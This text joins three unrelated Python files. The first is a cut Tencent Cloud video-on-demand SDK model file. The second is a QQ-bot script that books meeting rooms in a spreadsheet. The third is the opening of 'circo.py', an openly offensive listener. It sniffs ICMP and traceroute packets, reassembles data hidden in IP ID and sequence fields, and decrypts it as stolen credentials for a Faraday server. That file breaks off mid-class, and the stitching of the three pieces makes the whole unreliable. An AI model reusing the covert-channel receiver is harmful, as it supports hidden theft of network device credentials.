:param SessionContext: 来源上下文,用于透传用户请求信息,任务流状态变更回调将返回该字段值,最长 1000 个字符。
:type SessionContext: str
:param SessionId: 用于去重的识别码,如果七天内曾有过相同的识别码的请求,则本次的请求会返回错误。最长 50 个字符,不带或者带空字符串表示不做去重。
:type SessionId: str
:param ExtInfo: 保留字段,特殊用途时使用。
:type ExtInfo: str
:param SubAppId: 点播[子应用](/document/product/266/14574) ID。如果要访问子应用中的资源,则将该字段填写为子应用 ID;否则无需填写该字段。
:type SubAppId: int
"""
self.FunctionName = None
self.FunctionArg = None
self.SessionContext = None
self.SessionId = None
self.ExtInfo = None
self.SubAppId = None
def _deserialize(self, params):
self.FunctionName = params.get("FunctionName")
self.FunctionArg = params.get("FunctionArg")
self.SessionContext = params.get("SessionContext")
self.SessionId = params.get("SessionId")
self.ExtInfo = params.get("ExtInfo")
self.SubAppId = params.get("SubAppId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ExecuteFunctionResponse(AbstractModel):
"""ExecuteFunction返回参数结构体
"""
def __init__(self):
"""
:param Result: 处理结果打包后的字符串,具体与后台一同协调。
:type Result: str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.Result = None
self.RequestId = None
def _deserialize(self, params):
self.Result = params.get("Result")
self.RequestId = params.get("RequestId")
class FaceConfigureInfo(AbstractModel):
"""人脸识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 人脸识别任务开关,可选值:
<li>ON:开启智能人脸识别任务;</li>
<li>OFF:关闭智能人脸识别任务。</li>
:type Switch: str
:param Score: 人脸识别过滤分数,当识别结果达到该分数以上,返回识别结果。默认 95 分。取值范围:0 - 100。
:type Score: float
:param DefaultLibraryLabelSet: 默认人物过滤标签,指定需要返回的默认人物的标签。如果未填或者为空,则全部默认人物结果都返回。标签可选值:
<li>entertainment:娱乐明星;</li>
<li>sport:体育明星;</li>
<li>politician:政治人物。</li>
:type DefaultLibraryLabelSet: list of str
:param UserDefineLibraryLabelSet: 用户自定义人物过滤标签,指定需要返回的用户自定义人物的标签。如果未填或者为空,则全部自定义人物结果都返回。
标签个数最多 100 个,每个标签长度最多 16 个字符。
:type UserDefineLibraryLabelSet: list of str
:param FaceLibrary: 人物库选择,可选值:
<li>Default:使用默认人物库;</li>
<li>UserDefine:使用用户自定义人物库。</li>
<li>All:同时使用默认人物库和用户自定义人物库。</li>
默认值:All,使用系统默认人物库及用户自定义人物库。
:type FaceLibrary: str
"""
self.Switch = None
self.Score = None
self.DefaultLibraryLabelSet = None
self.UserDefineLibraryLabelSet = None
self.FaceLibrary = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.Score = params.get("Score")
self.DefaultLibraryLabelSet = params.get("DefaultLibraryLabelSet")
self.UserDefineLibraryLabelSet = params.get("UserDefineLibraryLabelSet")
self.FaceLibrary = params.get("FaceLibrary")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class FaceConfigureInfoForUpdate(AbstractModel):
"""人脸识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 人脸识别任务开关,可选值:
<li>ON:开启智能人脸识别任务;</li>
<li>OFF:关闭智能人脸识别任务。</li>
:type Switch: str
:param Score: 人脸识别过滤分数,当识别结果达到该分数以上,返回识别结果。取值范围:0-100。
:type Score: float
:param DefaultLibraryLabelSet: 默认人物过滤标签,指定需要返回的默认人物的标签。如果未填或者为空,则全部默认人物结果都返回。标签可选值:
<li>entertainment:娱乐明星;</li>
<li>sport:体育明星;</li>
<li>politician:政治人物。</li>
:type DefaultLibraryLabelSet: list of str
:param UserDefineLibraryLabelSet: 用户自定义人物过滤标签,指定需要返回的用户自定义人物的标签。如果未填或者为空,则全部自定义人物结果都返回。
标签个数最多 100 个,每个标签长度最多 16 个字符。
:type UserDefineLibraryLabelSet: list of str
:param FaceLibrary: 人物库选择,可选值:
<li>Default:使用默认人物库;</li>
<li>UserDefine:使用用户自定义人物库。</li>
<li>All:同时使用默认人物库和用户自定义人物库。</li>
:type FaceLibrary: str
"""
self.Switch = None
self.Score = None
self.DefaultLibraryLabelSet = None
self.UserDefineLibraryLabelSet = None
self.FaceLibrary = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.Score = params.get("Score")
self.DefaultLibraryLabelSet = params.get("DefaultLibraryLabelSet")
self.UserDefineLibraryLabelSet = params.get("UserDefineLibraryLabelSet")
self.FaceLibrary = params.get("FaceLibrary")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class FileDeleteTask(AbstractModel):
"""文件删除任务
"""
def __init__(self):
"""
:param FileIdSet: 删除文件 ID 列表。
:type FileIdSet: list of str
"""
self.FileIdSet = None
def _deserialize(self, params):
self.FileIdSet = params.get("FileIdSet")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class FileUploadTask(AbstractModel):
"""文件上传任务信息
"""
def __init__(self):
"""
:param FileId: 文件唯一 ID。
:type FileId: str
:param MediaBasicInfo: 上传完成后生成的媒体文件基础信息。
:type MediaBasicInfo: :class:`tencentcloud.vod.v20180717.models.MediaBasicInfo`
:param ProcedureTaskId: 若视频上传时指定了视频处理流程,则该字段为流程任务 ID。
:type ProcedureTaskId: str
:param MetaData: 元信息。包括大小、时长、视频流信息、音频流信息等。
注意:此字段可能返回 null,表示取不到有效值。
:type MetaData: :class:`tencentcloud.vod.v20180717.models.MediaMetaData`
"""
self.FileId = None
self.MediaBasicInfo = None
self.ProcedureTaskId = None
self.MetaData = None
def _deserialize(self, params):
self.FileId = params.get("FileId")
if params.get("MediaBasicInfo") is not None:
self.MediaBasicInfo = MediaBasicInfo()
self.MediaBasicInfo._deserialize(params.get("MediaBasicInfo"))
self.ProcedureTaskId = params.get("ProcedureTaskId")
if params.get("MetaData") is not None:
self.MetaData = MediaMetaData()
self.MetaData._deserialize(params.get("MetaData"))
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ForbidMediaDistributionRequest(AbstractModel):
"""ForbidMediaDistribution请求参数结构体
"""
def __init__(self):
"""
:param FileIds: 媒体文件列表,每次最多可提交 20 条。
:type FileIds: list of str
:param Operation: forbid:禁播,recover:解禁。
:type Operation: str
:param SubAppId: 点播[子应用](/document/product/266/14574) ID 。如果要访问子应用中的资源,则将该字段填写为子应用 ID;否则无需填写该字段。
:type SubAppId: int
"""
self.FileIds = None
self.Operation = None
self.SubAppId = None
def _deserialize(self, params):
self.FileIds = params.get("FileIds")
self.Operation = params.get("Operation")
self.SubAppId = params.get("SubAppId")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ForbidMediaDistributionResponse(AbstractModel):
"""ForbidMediaDistribution返回参数结构体
"""
def __init__(self):
"""
:param NotExistFileIdSet: 不存在的文件 ID 列表。
:type NotExistFileIdSet: list of str
:param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
:type RequestId: str
"""
self.NotExistFileIdSet = None
self.RequestId = None
def _deserialize(self, params):
self.NotExistFileIdSet = params.get("NotExistFileIdSet")
self.RequestId = params.get("RequestId")
class FrameTagConfigureInfo(AbstractModel):
"""智能按帧标签任务控制参数
"""
def __init__(self):
"""
:param Switch: 智能按帧标签任务开关,可选值:
<li>ON:开启智能按帧标签任务;</li>
<li>OFF:关闭智能按帧标签任务。</li>
:type Switch: str
:param ScreenshotInterval: 截帧间隔,单位为秒,当不填时,默认截帧间隔为 1 秒,最小值为 0.5 秒。
:type ScreenshotInterval: float
"""
self.Switch = None
self.ScreenshotInterval = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.ScreenshotInterval = params.get("ScreenshotInterval")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class FrameTagConfigureInfoForUpdate(AbstractModel):
"""智能按帧标签任务控制参数
"""
def __init__(self):
"""
:param Switch: 智能按帧标签任务开关,可选值:
<li>ON:开启智能按帧标签任务;</li>
<li>OFF:关闭智能按帧标签任务。</li>
:type Switch: str
:param ScreenshotInterval: 截帧间隔,单位为秒,最小值为 0.5 秒。
:type ScreenshotInterval: float
"""
self.Switch = None
self.ScreenshotInterval = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
self.ScreenshotInterval = params.get("ScreenshotInterval")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HeadTailConfigureInfo(AbstractModel):
"""视频片头片尾识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 视频片头片尾识别任务开关,可选值:
<li>ON:开启智能视频片头片尾识别任务;</li>
<li>OFF:关闭智能视频片头片尾识别任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HeadTailConfigureInfoForUpdate(AbstractModel):
"""视频片头片尾识别任务控制参数
"""
def __init__(self):
"""
:param Switch: 视频片头片尾识别任务开关,可选值:
<li>ON:开启智能视频片头片尾识别任务;</li>
<li>OFF:关闭智能视频片头片尾识别任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HeadTailTaskInput(AbstractModel):
"""片尾任务输入类型。
"""
def __init__(self):
"""
:param Definition: 片头片尾模板号。
:type Definition: int
"""
self.Definition = None
def _deserialize(self, params):
self.Definition = params.get("Definition")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HeadTailTemplate(AbstractModel):
"""片头片尾模板详情
"""
def __init__(self):
"""
:param Definition: 片头片尾模板号。
:type Definition: int
:param Name: 模板名,最大支持 64 个字符。
:type Name: str
:param Comment: 模板描述,最大支持 256 个字符。
:type Comment: str
:param HeadCandidateSet: 片头候选列表。使用时会选择跟正片分辨率最贴近的一个使用,当存在相同的候选时,选择第一个使用,最大支持 5 个。
:type HeadCandidateSet: list of str
:param TailCandidateSet: 片尾候选列表。使用时会选择跟正片分辨率最贴近的一个使用,当存在相同的候选时,选择第一个使用,最大支持 5 个。
:type TailCandidateSet: list of str
:param FillType: 填充方式,当视频流配置宽高参数与原始视频的宽高比不一致时,对转码的处理方式,即为“填充”。可选填充方式:
<li> stretch:拉伸,对每一帧进行拉伸,填满整个画面,可能导致转码后的视频被“压扁“或者“拉长“;</li>
<li> gauss:高斯模糊,保持视频宽高比不变,边缘剩余部分使用高斯模糊;</li>
<li> white:留白,保持视频宽高比不变,边缘剩余部分使用白色填充;</li>
<li> black:留黑,保持视频宽高比不变,边缘剩余部分使用黑色填充。</li>
默认值:stretch 。
:type FillType: str
"""
self.Definition = None
self.Name = None
self.Comment = None
self.HeadCandidateSet = None
self.TailCandidateSet = None
self.FillType = None
def _deserialize(self, params):
self.Definition = params.get("Definition")
self.Name = params.get("Name")
self.Comment = params.get("Comment")
self.HeadCandidateSet = params.get("HeadCandidateSet")
self.TailCandidateSet = params.get("TailCandidateSet")
self.FillType = params.get("FillType")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HighlightSegmentItem(AbstractModel):
"""智能精彩集锦片段列表。
"""
def __init__(self):
"""
:param Confidence: 置信度。
:type Confidence: float
:param StartTimeOffset: 片段起始时间偏移。
:type StartTimeOffset: float
:param EndTimeOffset: 片段结束时间偏移。
:type EndTimeOffset: float
"""
self.Confidence = None
self.StartTimeOffset = None
self.EndTimeOffset = None
def _deserialize(self, params):
self.Confidence = params.get("Confidence")
self.StartTimeOffset = params.get("StartTimeOffset")
self.EndTimeOffset = params.get("EndTimeOffset")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class HighlightsConfigureInfo(AbstractModel):
"""智能精彩片段任务控制参数
"""
def __init__(self):
"""
:param Switch: 智能精彩片段任务开关,可选值:
<li>ON:开启智能精彩片段任务;</li>
<li>OFF:关闭智能精彩片段任务。</li>
:type Switch: str
"""
self.Switch = None
def _deserialize(self, params):
self.Switch = params.get("Switch")
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
| |
<filename>ch/meeting_tools.py<gh_stars>0
"""
这个文件应该放在全局可以import的位置供xl.py调用
比如说现在我的D:/anaconda/Lib
(xl.py按照要求放在了C:/Users/c2534/.qqbot-tmp/plugins)
有时候(脚本运行后修改这个文件)这个文件会不起作用,手动重启qqbot用命令 qq fresh-restart扫码
"""
import datetime
from openpyxl import load_workbook, Workbook
import os
import re
# todo 规范一下好
def botreply(bot, contact, member, s):
# if '机器人回复' 开头:
# return
# 判断contact还是member
# bot.SendTo(contact, "机器人回复 \n"+s)
pass
def ask_info(file, dates):
info = ['无记录']
# 打开这个文件
f = get_excel_file(file)
# 用dates[:7]找sheet
fsheet = get_excel_sheet(dates, f)
# 用dates找row
frow = -1
for i in range(1, fsheet.max_row+1):
if fsheet.cell(row=i, column=1).value == dates:
frow = i
break
if frow == -1:
return info
# 默认deltarow为
deltafrow = 52 # 8:00-20:45=12*4+4=52
for i in range(2, fsheet.max_column+1): # 列
for j in range(1+frow, deltafrow+1+frow): # 行
if fsheet.cell(row=j, column=i).value is None:
continue
if fsheet.cell(row=j, column=i).value not in info:
info.append(str(fsheet.cell(row=j, column=i).value))
# 关闭文件
f.close()
if len(info) > 1:
info[:] = info[1:] # 删除第一个元素
return info
def my_watch_group(contact, group_name):
return contact.nick in group_name
# todo 考虑使用redis json存储规则
# 但因为是py脚本运行 随时可以修改代码 需求不强烈
def dialog_clearify(content):
"""
这里面的顺序不要乱
:param content:
:return:
"""
d = content
if not isinstance(d, type("字符串类型")):
return ""
clearify_dict = {'~~~': '-', "~~": "-", ' ': ' ',
'~~': '-', '~': '-', '---': '-',
'--': '-', '——': '-', ':': ':',
'~': '-',
'全天': '8:30-18:00',
'12楼': '12层', '13楼': '13层', '十三楼': '13层', '十二楼': '12层',
'今日': '今天', '明日': '明天',
'合昌': '和昌', '合唱': '和昌', '和唱': '和昌',
'点半': ':30', '点30': ':30', '点三十': ':30',
'点': ':00',
'十一': '11', '十二': '12', '十三': '13',
'十四': '14', '十五': '15', '十六': '16',
'十七': '17', '十八': '18', '十九': '19',
'二十': '20', '十': '10',
'九': '9', '八': '8', '七': '7',
'六': '6', '五': '5', '四': '4',
'三': '3', '二': '2', '一': '1',
'下午8:': '20:',
'预订': '预定',
'到': '-',
'(': '(', ')': ')',
',': '.', ',': '.', '。': '.'
}
for (k, v) in clearify_dict.items():
d = d.replace(k, v)
# 5:30-6:00 转换成 17:30-18:00
r1 = re.findall(r'([^0-9:-]?)([1-7])(:[0-9]{2,3}-)([2-8])(:[0-9]{2,3})', d)
if len(r1) >= 1:
d = re.subn(r'([^0-9:-]?)([1-7])(:[0-9]{2,3}-)([2-8])(:[0-9]{2,3})',
r1[0][0] + str(int(r1[0][1]) + 12) + r1[0][2] + str(int(r1[0][3]) + 12) + r1[0][4],
d)[0]
r1 = re.findall(r'([^0-9:])([0-9]{1,3})(-[0-9]{1,3}:[0-9]{2,3})', d)
if len(r1) >= 1:
d = re.subn(r'([^0-9:])([0-9]{1,3})(-[0-9]{1,3}:[0-9]{2,3})', r1[0][0] + r1[0][1] + ':00' + r1[0][2], d)[0]
return d
def is_cmd(dialog):
if not isinstance(dialog, type("")):
return ''
if "会议室" in dialog:
if "预" in dialog or "订" in dialog or "定" in dialog:
return dialog
return ''
def get_meetingrooms_names():
return ['小会议室', '大会议室', '13层会议室', '【会议室名称不详】无法正确记录']
def find_fangjian(dialog):
"""
用正则表达式从dialog中取出定义好的会议室名称
http://www.runoob.com/regexp/regexp-metachar.html
正则表达式教程↑
:param dialog: 传入的字符串
:return: 传出会议室序号
"""
huiyishi = get_meetingrooms_names()
meeting_room = '12层大会议室'
r1 = re.findall(r'([1][23]层)', dialog)
r2 = re.findall(r'([大小]?会议室)', dialog)
if r1.__len__() > 0:
if r1[0] == '13层': # 当前情况下13层只有一个会议室2
return 2
meeting_room = r1[0] + meeting_room[3:]
if r2.__len__() > 0:
meeting_room = meeting_room[:3] + r2[0]
for i in range(len(huiyishi)):
if meeting_room.find(huiyishi[i]) > -1:
return i # 0 1 2
return len(huiyishi)-1 # 3
def find_shijian(dialog):
st = '8:30'
et = '18:00'
r1 = re.findall(r'([0-9]?[0-9])[:点:]([0-5][0-9])', dialog)
if r1.__len__() >= 1: # 至少有一个时间
st = r1[0][0] + ':' + shijian_fenzhong_round(r1[0][1])
if r1.__len__() >= 2: # 有两个时间
et = shijian_round2(r1[1][0] + ':' + r1[1][1])
if r1.__len__() <= 0:
if dialog.find('上午') > -1:
st, et = '8:30', '12:00'
if dialog.find('下午') > -1:
st, et = '14:00', '18:00'
# 安全检查是否在早8:00-20:30之间
if int(st[:st.find(':')]) < 8:
st = '8' + st[st.find(':'):]
if int(st[:st.find(':')]) > 20:
st = '20' + st[st.find(':'):]
if int(et[:et.find(':')]) < 8:
et = '8' + et[et.find(':'):]
if int(et[:et.find(':')]) > 20:
et = '20' + et[et.find(':'):]
return st, et
def shijian_fenzhong_round(s):
if int(s) < 15:
return '00'
if int(s) < 30:
return '15'
if int(s) < 45:
return '30'
if int(s) < 60:
return '45'
return '45'
def shijian_round2(s):
if int(s[-2:]) > 45:
return str(int(s[:s.find(':')])+1) + ':00'
if int(s[-2:]) > 30:
return s[:s.find(':')] + ':45'
if int(s[-2:]) > 15:
return s[:s.find(':')] + ':30'
if int(s[-2:]) > 0:
return s[:s.find(':')] + ':15'
if int(s[-2:]) == 0:
return s
return s
def find_yuding(dialog):
return not ("取消" in dialog)
def find_riqi(dialog):
"""
:param dialog: 4.2
:return: 2018-04-02
"""
findre = re.findall(r'([12]?[0-9])[月.]([0-3]?[0-9])[日号]?', dialog) # 12月02日 10.3
if len(findre) == 1:
if len(findre[0][0]) == 1:
a = '0' + findre[0][0]
else:
a = findre[0][0]
if len(findre[0][1]) == 1:
b = '0' + findre[0][1]
else:
b = findre[0][1]
return datetime.date.today().__str__()[:5] + a + '-' + b # 2018-12-02
findre = re.findall(r'([0-3]?[0-9])[日号]', dialog) # 2号
if len(findre) == 1:
if len(findre[0]) == 1:
a = '0' + findre[0]
else:
a = findre[0]
return datetime.date.today().__str__()[:8] + a # 2018-12-02
if -1 < dialog.find("今"):
return datetime.date.today().__str__()
elif -1 < dialog.find("明"):
return (datetime.date.today() + datetime.timedelta(days=1)).__str__()
elif -1 < dialog.find("后"):
return (datetime.date.today() + datetime.timedelta(days=2)).__str__()
return datetime.date.today().__str__()
def get_excel_row(sheet, today):
"""
:param sheet:
:param today: datetime.date.today().__str__()
:return: row of today 只有日期没时间的那一行
"""
find_ornot = False
find_row = 0
for i in range(1, sheet.max_row+1):
if sheet.cell(row=i, column=1).value == today:
find_ornot = True
find_row = i
break
if find_ornot:
writetime(sheet=sheet, startrow=find_row + 1)
return find_row
else:
find_row = sheet.max_row + 1
sheet.cell(row=find_row, column=1).value = today
writetime(sheet=sheet, startrow=find_row + 1)
return find_row
def writetime(sheet, startrow):
"""
不包括today信息的一天时间
:param sheet:
:param startrow:
:return:
"""
m = ["00", "15", "30", "45"]
h = [i.__str__() for i in range(8, 21, 1)]
crow = startrow
for _h in h:
for _m in m:
sheet.cell(row=crow, column=1).value = _h + ":" + _m + ":00"
crow = crow + 1
def get_dtime(st, et):
"""
todo 感觉可以写成一个函数
计算所给时间段距离8:00的格子数 默认15min
请注意8:00是第一个格子
:param st: 时间 8:00
:param et: 时间 9:30
:return: 起始时间所在行是当天日期所在行+ds
"""
a = int(st[:st.find(":")])
b = int(st[st.find(":") + 1:])
c = int(et[:et.find(":")])
d = int(et[et.find(":") + 1:])
ds = (a - 8) * 4 + b // 15 + 1
de = (c - 8) * 4 + d // 15 + 1
return ds, de
def get_excel_file(filename):
"""
:param filename: 文件名带后缀的
:return: 打开指定文件名的文件对象
"""
# 得到当前系统目录下的文件名列表
dir_files = os.listdir(os.getcwd())
# 当前路径下有filename文件
if filename in dir_files:
wb = load_workbook(filename)
else:
wb = Workbook()
wb.save(filename)
wb = load_workbook(filename)
return wb
def get_excel_sheet(riqi, file):
sheetnames = file.get_sheet_names() # 所有表名
month_name = riqi[:7] # 目标表名
if month_name in sheetnames: # 存在
return file.get_sheet_by_name(name=month_name)
else:
return create_sheet(month_name, file)
def create_sheet(sheetname, file):
"""
:param sheetname: string
:param file: excel文件对象
:return: sheet对象
"""
# 如果excel文件中有这个名字的sheet 就直接返回这个sheet对象
if sheetname in file.get_sheet_names():
return file.get_sheet_by_name(sheetname)
# 在excel文件中新建一个名为sheetname的sheet
file.create_sheet(sheetname)
sheet = file.get_sheet_by_name(sheetname)
# 左上角 A1 写入今天的日期
sheet.cell(row=1, column=1).value = datetime.date.today().__str__() # [:8]+"01"
# 写时间
writetime(sheet=sheet, startrow=2)
# 写会议室名字
meeting_roomnames = get_meetingrooms_names()
# for (i, n) in meeting_roomnames:
# sheet.cell(row=1, column=i).value = n
for i in range(len(meeting_roomnames)):
sheet.cell(row=1, column=i+2).value = meeting_roomnames[i]
return sheet
def deal_book(sheet, start, end, column, info, book, bot, contact, member):
if book:
# 预定命令
occupied, occupied_info = is_occupied(sheet, start, end, column) # 是否被占用 占用信息
if occupied:
# 如果占用
bot.SendTo(contact, "机器人回复 失败,因为\"" + occupied_info + "\"占用")
# print("您预定失败,因为\"" + occupied_info + "\"占用")
else:
# 没有占用
occupy_it(sheet, start, end, column, info)
bot.SendTo(contact, "机器人回复 成功\n"+" 记录的信息: "+member.name+" "+info[-32:])
# print("成功预定")
else:
# 取消预定
unoccupy_it(sheet, start, end, column)
bot.SendTo(contact, '机器人回复 '+str(info[:info.find(' 群"')]) + "取消成功")
# print("取消预定")
print('\n')
def is_occupied(sheet, start, end, column):
busy = False # 假设没占用
busy_info = ""
for i in range(start, end, 1):
if sheet.cell(row=i, column=column).value is not None:
busy_info = sheet.cell(row=i, column=column).value
busy = True
break
return busy, busy_info
def occupy_it(sheet, st, en, co, info="占用人信息"):
for i in range(st, en, 1):
sheet.cell(column=co, row=i).value = info
def unoccupy_it(sheet, st, en, co):
for i in range(st, en, 1):
sheet.cell(column=co, row=i).value = None
def excel_file_close(file, name):
file.save(filename=name)
def _test_dialog_clearify():
assert dialog_clearify('预定4月2日和昌12楼小会议室5:30-6:00') \
== '预定4月2日和昌12层小会议室17:30-18:00', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定4月2日和昌12楼小会议室2:30-6:00') \
== '预定4月2日和昌12层小会议室14:30-18:00', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定4月3日和昌12楼大会议室9:00-11:00') \
== '预定4月3日和昌12层大会议室9:00-11:00', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定4月2日上午和昌12楼小会议室,9:00--11:30') \
== '预定4月2日上午和昌12层小会议室.9:00-11:30', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定28日(今天)下午12楼大会议室,15:00到16:00') \
== '预定28日(今天)下午12层大会议室.15:00-16:00', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定今天全天小会议室') \
== '预定今天8:30-18:00小会议室', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定4月2日和昌13楼大会议室11:00-12:00') \
== '预定4月2日和昌13层大会议室11:00-12:00', '对话语句清理函数dialog_clearify有问题'
assert dialog_clearify('预定27号,下午14点30到17点,和昌12层大会议室') \
== '预定27号.下午14:30-17:00.和昌12层大会议室', '对话语句清理函数dialog_clearify有问题'
def _test_find_fangjian():
assert find_fangjian('预定4月2日和昌12层小会议室17:30-18:00') == 0, '寻找会议室编号函数find_fangjian有问题'
assert find_fangjian('预定4月3日和昌12层大会议室9:00-11:00') == 1, '寻找会议室编号函数find_fangjian有问题'
assert find_fangjian('预定4月2日和昌13层大会议室11:00-12:00') == 2, '寻找会议室编号函数find_fangjian有问题'
assert find_fangjian('预定4月2日和昌13层会议室11:00-12:00') == 2, '寻找会议室编号函数find_fangjian有问题'
assert find_fangjian('预定今天8:30-18:00小会议室') == 0, '寻找会议室编号函数find_fangjian有问题'
assert find_fangjian('预定今天8:30-18:00老楼会议室') == 3, '寻找会议室编号函数find_fangjian有问题'
def _test_find_shijian():
assert find_shijian('预定4月2日和昌12层小会议室17:30-18:00') == ('17:30', '18:00'), '寻找开始和结束时间函数find_shijian有问题'
assert find_shijian('预定4月2日和昌12层小会议室14:30-18:00') == ('14:30', '18:00'), '寻找开始和结束时间函数find_shijian有问题'
assert find_shijian('预定28日(今天)下午12层大会议室.15:00-16:00') == ('15:00', '16:00'), '寻找开始和结束时间函数find_shijian有问题'
assert find_shijian('预定今天8:30-18:00小会议室') == ('8:30', '18:00'), '寻找开始和结束时间函数find_shijian有问题'
assert find_shijian('预定上午大会议室') == ('8:30', '12:00'), '寻找开始和结束时间函数find_shijian有问题'
assert find_shijian('订小会议室 9:10-10:30') == ('9:00', '10:30'), '寻找开始和结束时间函数find_shijian有问题'
def _test_find_riqi():
assert find_riqi('预定4月2日和昌12层小会议室17:30-18:00') == '2018-04-02', '寻找日期函数find_riqi有问题'
assert find_riqi('预定今天8:30-18:00小会议室') == datetime.date.today().__str__(), '寻找日期函数find_riqi有问题'
assert find_riqi('预定30日下午12楼小会议室.14:00-16:00') == '2018-04-30', '寻找日期函数find_riqi有问题'
assert find_riqi('预定27号.下午14:30-17:00.和昌12层大会议室') == '2018-04-27', '寻找日期函数find_riqi有问题'
assert find_riqi('预订12楼大会议室,12点到14点')[:7] == datetime.date.today().__str__()[:7], | |
<reponame>Satcomx00-x00/circo----Cisco
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
circo.py source code
"""
from __future__ import print_function
import sys
import re
import argparse
import time
import threading
import collections
import socket
import ConfigParser
import requests
import pyaes
import pyscrypt
from pyfiglet import Figlet
from scapy.all import Raw, IP, ICMP, TCP, UDP, DNS, sniff
# Me
__author__ = "Emilio / @ekio_jp"
__version__ = "1.5"
# Config
PHRASE = 'Waaaaa! awesome :)'
SALT = 'salgruesa'
CCNAME = 'evil.sub.domain'
DEBUG = False
PLUG = False
FSERVER = ''
FUSER = ''
FPASSWD = ''
FWS = ''
FSESSION = False
# Faraday objects (host & credentials)
HOST = {"ip":"",
"hostnames":[],
"mac":"00:00:00:00:00:00",
"description":"",
"default_gateway":"None",
"os":"",
"owned":"false",
"owner":""
}
CREDENTIAL = {"name":"",
"username":"",
"password":"",
"type":"Cred",
"parent_type":"Host",
"parent":"",
"owner":"",
"description":""
}
# Classes
class PINGHandler(threading.Thread):
"""
Class to observe PING packets
and decrypt credentials
"""
def __init__(self, iface, fd):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
def pkt_callback(self, pkt):
"""
Process PING packets
"""
if pkt[ICMP].type == 8:
if pkt[IP].id >= 200 and pkt[IP].id < 300:
self.pktlen = pkt[IP].id - 200
elif pkt[IP].id >= 300 and pkt[IP].id < 400:
self.pkttotal = pkt[IP].id - 300
elif pkt[IP].id >= 500 and pkt[IP].id < 600:
self.dic[pkt[IP].id - 500] = '{:04x}'.format(pkt[ICMP].seq)
elif pkt[IP].id == 666:
if DEBUG:
print(time.strftime("%Y-%m-%d %H:%M:%S ", time.gmtime())
+ 'PING:' + pkt[IP].src + ':ALARM Case Open!')
if len(self.dic) == self.pkttotal:
odic = collections.OrderedDict(sorted(self.dic.items()))
final = ''
for value in odic.iteritems():
final = final + value[1]
text = decrypt(final[:self.pktlen])
text = text.strip()
hexip = text.split(',')[-1]
text = text.replace(hexip, hextoip(hexip))
text = 'PING:' + pkt[IP].src + ':' + text
printer(self.filed, text)
self.dic = {}
self.pkttotal = 200
def run(self):
while not self.stoprequest.isSet():
sniff(iface=self.iface, prn=self.pkt_callback, filter="icmp",
store=0)
def killer(self):
"""
stop Thread
"""
self.stoprequest.set()
class TraceHandler(threading.Thread):
"""
Class to observe UDP packets (portrange 33434-33500)
and decrypt credentials
"""
def __init__(self, iface, fd):
threading.Thread.__init__(self)
self.stoprequest = threading.Event()
self.iface = iface
self.filed = fd
self.dic = {}
self.pkttotal = 200
self.pktlen = 0
def pkt_callback(self, pkt):
"""
Process Traceroute packets
"""
if pkt[IP].id >= 200 and pkt[IP].id < 300:
self.pktlen = pkt[IP].id - 200
